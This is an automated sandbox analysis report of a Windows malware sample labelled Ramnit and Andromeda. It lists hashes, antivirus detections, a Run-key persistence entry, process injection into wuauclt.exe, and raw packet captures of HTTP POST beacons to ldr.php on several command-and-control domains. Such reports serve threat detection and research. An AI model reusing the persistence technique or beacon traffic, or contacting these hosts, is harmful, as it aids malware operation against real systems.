Analysis Date | 2015-08-07 09:25:11 |
---|---|
MD5 | b89d04991259d89b3c5cba4680b41d14 |
SHA1 | 1bf0194aa3ee4186afa381836fc4c76b9163c323 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 2cac747949d6d4c8ad93d826f91894d7 sha1: 962ce9986df988696d8aa65207a7c01891d2799f size: 59392 | |
Section | .rdata md5: b6f626c36f35902475f8149097675376 sha1: 23de5ae8c94087d3d33b45310aba913eba34d067 size: 20992 | |
Section | .data md5: e6d38ab08a9fe9cbad2d493ca324a0c0 sha1: 41675827a2fa71ab58afa301fe7a2dde3c720ca4 size: 15360 | |
Section | .rsrc md5: b3acf3c029e373f7cfa1e4f685c79fa5 sha1: ae758a4fd874eea778ce75b45f3bba34e205b856 size: 214016 | |
Section | cvvvwji md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 | |
Section | .text md5: 2b45ad4d2a3807cf41685e5f944e12af sha1: fd271b59d32f3a46d4cb3261118c9bba72a61e94 size: 148480 | |
Timestamp | 2010-10-12 04:06:34 | |
Pdb path | c:\winter\Set\Bottom\Up\value\wild\industry\Support\nearcare.pdb | |
PEhash | 7bd208dd1622467a09d9c695907b8754bf0ba47b | |
IMPhash | b2498eed3c3aa5befc085379b8319a74 | |
AV | Rising | Win32.Mgr.a |
AV | Mcafee | W32/Ramnit.a |
AV | Avira (antivir) | W32/Ramnit.C |
AV | Twister | Virus.60E8000000005D8BC5.mg |
AV | Ad-Aware | Win32.Ramnit.N |
AV | Alwil (avast) | RmnDrp:Win32:RmnDrp |
AV | Eset (nod32) | Win32/Ramnit.H virus |
AV | Grisoft (avg) | Win32/Zbot.G |
AV | Symantec | W32.Ramnit.B!inf |
AV | Fortinet | W32/Ramnit.C |
AV | BitDefender | Win32.Ramnit.N |
AV | K7 | Virus ( 002fe95d1 ) |
AV | Microsoft Security Essentials | Virus:Win32/Ramnit.I |
AV | MicroWorld (escan) | Win32.Ramnit.N |
AV | MalwareBytes | Virus.Ramnit |
AV | Authentium | W32/Ramnit.D |
AV | Frisk (f-prot) | W32/Ramnit.D |
AV | Ikarus | Trojan-Downloader.Win32.Andromeda |
AV | Emsisoft | Win32.Ramnit.N |
AV | Zillya! | Virus.Nimnul.Win32.1 |
AV | Kaspersky | Virus.Win32.Nimnul.a |
AV | Trend Micro | PE_RAMNIT.DEN |
AV | CAT (quickheal) | W32.Ramnit.BA |
AV | VirusBlokAda (vba32) | Virus.Win32.Nimnul.b |
AV | Padvish | Downloader.Win32.Gamarue.AA |
AV | BullGuard | Win32.Ramnit.N |
AV | Arcabit (arcavir) | Win32.Ramnit.N |
AV | ClamAV | W32.Ramnit-1 |
AV | Dr. Web | BackDoor.Andromeda.178 |
AV | F-Secure | Win32.Ramnit.N |
AV | CA (E-Trust Ino) | Win32/Ramnit.C |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\1bf0194aa3ee4186afa381836fc4c76b9163c323mgr.exe |
---|---|
Creates Process | C:\1bf0194aa3ee4186afa381836fc4c76b9163c323mgr.exe |
Creates Process | C:\WINDOWS\system32\wuauclt.exe |
Process
↳ C:\1bf0194aa3ee4186afa381836fc4c76b9163c323mgr.exe
Creates File | PIPE\lsarpc |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\228c_appcompat.txt |
Creates Process | C:\WINDOWS\system32\dwwin.exe -x -s 180 |
Process
↳ C:\WINDOWS\system32\wuauclt.exe
Registry | HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\36874 ➝ C:\Documents and Settings\All Users\Local Settings\Temp\ccowmuaqe.pif\\x00 |
---|---|
Creates File | C:\Documents and Settings\All Users\Local Settings\Temp\ccowmuaqe.pif |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates Mutex | 3227095050 |
Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 180
Network Details:
DNS | www.update.microsoft.com.nsatc.net Type: A 65.55.50.189 |
---|---|
DNS | www.update.microsoft.com.nsatc.net Type: A 134.170.58.222 |
DNS | hzmksreiuojy.in Type: A 195.22.26.254 |
DNS | hzmksreiuojy.in Type: A 195.22.26.231 |
DNS | hzmksreiuojy.in Type: A 195.22.26.252 |
DNS | hzmksreiuojy.in Type: A 195.22.26.253 |
DNS | hzmksreiuojy.ru Type: A 52.28.3.6 |
DNS | hzmksreiuojy.biz Type: A 52.28.3.6 |
DNS | hzmksreiuojy.nl Type: A 176.58.104.168 |
DNS | www.update.microsoft.com Type: A |
DNS | hzmksreiuojy.com Type: A |
HTTP POST | http://8.8.8.8/xxxxxxxxx.php User-Agent: Mozilla/4.0 |
HTTP POST | http://hzmksreiuojy.in/ldr.php User-Agent: Mozilla/4.0 |
HTTP POST | http://hzmksreiuojy.ru/ldr.php User-Agent: Mozilla/4.0 |
HTTP POST | http://hzmksreiuojy.biz/ldr.php User-Agent: Mozilla/4.0 |
HTTP POST | http://hzmksreiuojy.nl/ldr.php User-Agent: Mozilla/4.0 |
Flows TCP | 192.168.1.1:1031 ➝ 65.55.50.189:80 |
Flows TCP | 192.168.1.1:1032 ➝ 8.8.8.8:80 |
Flows UDP | 192.168.1.1:1033 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1034 ➝ 195.22.26.254:80 |
Flows UDP | 192.168.1.1:1035 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1036 ➝ 52.28.3.6:80 |
Flows UDP | 192.168.1.1:1037 ➝ 8.8.4.4:53 |
Flows UDP | 192.168.1.1:1038 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1039 ➝ 52.28.3.6:80 |
Flows UDP | 192.168.1.1:1040 ➝ 8.8.4.4:53 |
Flows TCP | 192.168.1.1:1041 ➝ 176.58.104.168:80 |
Raw Pcap
0x00000000 (00000) 504f5354 202f7878 78787878 7878782e POST /xxxxxxxxx. 0x00000010 (00016) 70687020 48545450 2f312e31 0d0a486f php HTTP/1.1..Ho 0x00000020 (00032) 73743a20 382e382e 382e380d 0a557365 st: 8.8.8.8..Use 0x00000030 (00048) 722d4167 656e743a 204d6f7a 696c6c61 r-Agent: Mozilla 0x00000040 (00064) 2f342e30 0d0a436f 6e74656e 742d5479 /4.0..Content-Ty 0x00000050 (00080) 70653a20 6170706c 69636174 696f6e2f pe: application/ 0x00000060 (00096) 782d7777 772d666f 726d2d75 726c656e x-www-form-urlen 0x00000070 (00112) 636f6465 640d0a43 6f6e7465 6e742d4c coded..Content-L 0x00000080 (00128) 656e6774 683a2038 340d0a43 6f6e6e65 ength: 84..Conne 0x00000090 (00144) 6374696f 6e3a2063 6c6f7365 0d0a0d0a ction: close.... 0x000000a0 (00160) 75707163 68437338 7646544b 464f566d upqchCs8vFTKFOVm 0x000000b0 (00176) 6e494b47 4977694c 7258387a 554e3638 nIKGIwiLrX8zUN68 0x000000c0 (00192) 54337971 76685175 32547165 74516e33 T3yqvhQu2TqetQn3 0x000000d0 (00208) 71497937 51366270 54664455 74594966 qIy7Q6bpTfDUtYIf 0x000000e0 (00224) 745a3333 4e42414f 4c417367 396d5933 tZ33NBAOLAsg9mY3 0x000000f0 (00240) 71773d3d qw== 0x00000000 (00000) 504f5354 202f6c64 722e7068 70204854 POST /ldr.php HT 0x00000010 (00016) 54502f31 2e310d0a 486f7374 3a20687a TP/1.1..Host: hz 0x00000020 (00032) 6d6b7372 6569756f 6a792e69 6e0d0a55 mksreiuojy.in..U 0x00000030 (00048) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000040 (00064) 6c612f34 2e300d0a 436f6e74 656e742d la/4.0..Content- 0x00000050 (00080) 54797065 3a206170 706c6963 6174696f Type: applicatio 0x00000060 (00096) 6e2f782d 7777772d 666f726d 2d75726c n/x-www-form-url 0x00000070 (00112) 656e636f 6465640d 0a436f6e 74656e74 encoded..Content 0x00000080 (00128) 2d4c656e 6774683a 2038340d 0a436f6e -Length: 84..Con 0x00000090 (00144) 6e656374 696f6e3a 20636c6f 73650d0a nection: close.. 0x000000a0 (00160) 0d0a7570 71636843 73387646 544b464f ..upqchCs8vFTKFO 0x000000b0 (00176) 566d6e49 4b474977 694c7258 387a554e VmnIKGIwiLrX8zUN 0x000000c0 (00192) 36385433 79717668 51753254 71657451 68T3yqvhQu2TqetQ 0x000000d0 (00208) 6e337149 79375136 62705466 44557459 n3qIy7Q6bpTfDUtY 0x000000e0 (00224) 4966745a 33334e42 414f4c41 7367396d IftZ33NBAOLAsg9m 0x000000f0 (00240) 59337177 3d3d Y3qw== 0x00000000 (00000) 504f5354 202f6c64 722e7068 70204854 POST /ldr.php HT 0x00000010 (00016) 54502f31 2e310d0a 486f7374 3a20687a TP/1.1..Host: hz 0x00000020 (00032) 6d6b7372 6569756f 6a792e72 750d0a55 mksreiuojy.ru..U 0x00000030 (00048) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000040 (00064) 6c612f34 2e300d0a 436f6e74 656e742d la/4.0..Content- 0x00000050 (00080) 54797065 3a206170 706c6963 6174696f Type: applicatio 0x00000060 (00096) 6e2f782d 7777772d 666f726d 2d75726c n/x-www-form-url 0x00000070 (00112) 656e636f 6465640d 0a436f6e 74656e74 encoded..Content 0x00000080 (00128) 2d4c656e 6774683a 2038340d 0a436f6e -Length: 84..Con 0x00000090 (00144) 6e656374 696f6e3a 20636c6f 73650d0a nection: close.. 0x000000a0 (00160) 0d0a7570 71636843 73387646 544b464f ..upqchCs8vFTKFO 0x000000b0 (00176) 566d6e49 4b474977 694c7258 387a554e VmnIKGIwiLrX8zUN 0x000000c0 (00192) 36385433 79717668 51753254 71657451 68T3yqvhQu2TqetQ 0x000000d0 (00208) 6e337149 79375136 62705466 44557459 n3qIy7Q6bpTfDUtY 0x000000e0 (00224) 4966745a 33334e42 414f4c41 7367396d IftZ33NBAOLAsg9m 0x000000f0 (00240) 59337177 3d3d Y3qw== 0x00000000 (00000) 504f5354 202f6c64 722e7068 70204854 POST /ldr.php HT 0x00000010 (00016) 54502f31 2e310d0a 486f7374 3a20687a TP/1.1..Host: hz 0x00000020 (00032) 6d6b7372 6569756f 6a792e62 697a0d0a mksreiuojy.biz.. 0x00000030 (00048) 55736572 2d416765 6e743a20 4d6f7a69 User-Agent: Mozi 0x00000040 (00064) 6c6c612f 342e300d 0a436f6e 74656e74 lla/4.0..Content 0x00000050 (00080) 2d547970 653a2061 70706c69 63617469 -Type: applicati 0x00000060 (00096) 6f6e2f78 2d777777 2d666f72 6d2d7572 on/x-www-form-ur 0x00000070 (00112) 6c656e63 6f646564 0d0a436f 6e74656e lencoded..Conten 0x00000080 (00128) 742d4c65 6e677468 3a203834 0d0a436f t-Length: 84..Co 0x00000090 (00144) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x000000a0 (00160) 0a0d0a75 70716368 43733876 46544b46 ...upqchCs8vFTKF 0x000000b0 (00176) 4f566d6e 494b4749 77694c72 58387a55 OVmnIKGIwiLrX8zU 0x000000c0 (00192) 4e363854 33797176 68517532 54716574 N68T3yqvhQu2Tqet 0x000000d0 (00208) 516e3371 49793751 36627054 66445574 Qn3qIy7Q6bpTfDUt 0x000000e0 (00224) 59496674 5a33334e 42414f4c 41736739 YIftZ33NBAOLAsg9 0x000000f0 (00240) 6d593371 773d3d mY3qw== 0x00000000 (00000) 504f5354 202f6c64 722e7068 70204854 POST /ldr.php HT 0x00000010 (00016) 54502f31 2e310d0a 486f7374 3a20687a TP/1.1..Host: hz 0x00000020 (00032) 6d6b7372 6569756f 6a792e6e 6c0d0a55 mksreiuojy.nl..U 0x00000030 (00048) 7365722d 4167656e 743a204d 6f7a696c ser-Agent: Mozil 0x00000040 (00064) 6c612f34 2e300d0a 436f6e74 656e742d la/4.0..Content- 0x00000050 (00080) 54797065 3a206170 706c6963 6174696f Type: applicatio 0x00000060 (00096) 6e2f782d 7777772d 666f726d 2d75726c n/x-www-form-url 0x00000070 (00112) 656e636f 6465640d 0a436f6e 74656e74 encoded..Content 0x00000080 (00128) 2d4c656e 6774683a 2038340d 0a436f6e -Length: 84..Con 0x00000090 (00144) 6e656374 696f6e3a 20636c6f 73650d0a nection: close.. 0x000000a0 (00160) 0d0a7570 71636843 73387646 544b464f ..upqchCs8vFTKFO 0x000000b0 (00176) 566d6e49 4b474977 694c7258 387a554e VmnIKGIwiLrX8zUN 0x000000c0 (00192) 36385433 79717668 51753254 71657451 68T3yqvhQu2TqetQ 0x000000d0 (00208) 6e337149 79375136 62705466 44557459 n3qIy7Q6bpTfDUtY 0x000000e0 (00224) 4966745a 33334e42 414f4c41 7367396d IftZ33NBAOLAsg9m 0x000000f0 (00240) 59337177 3d3d3d Y3qw===
Strings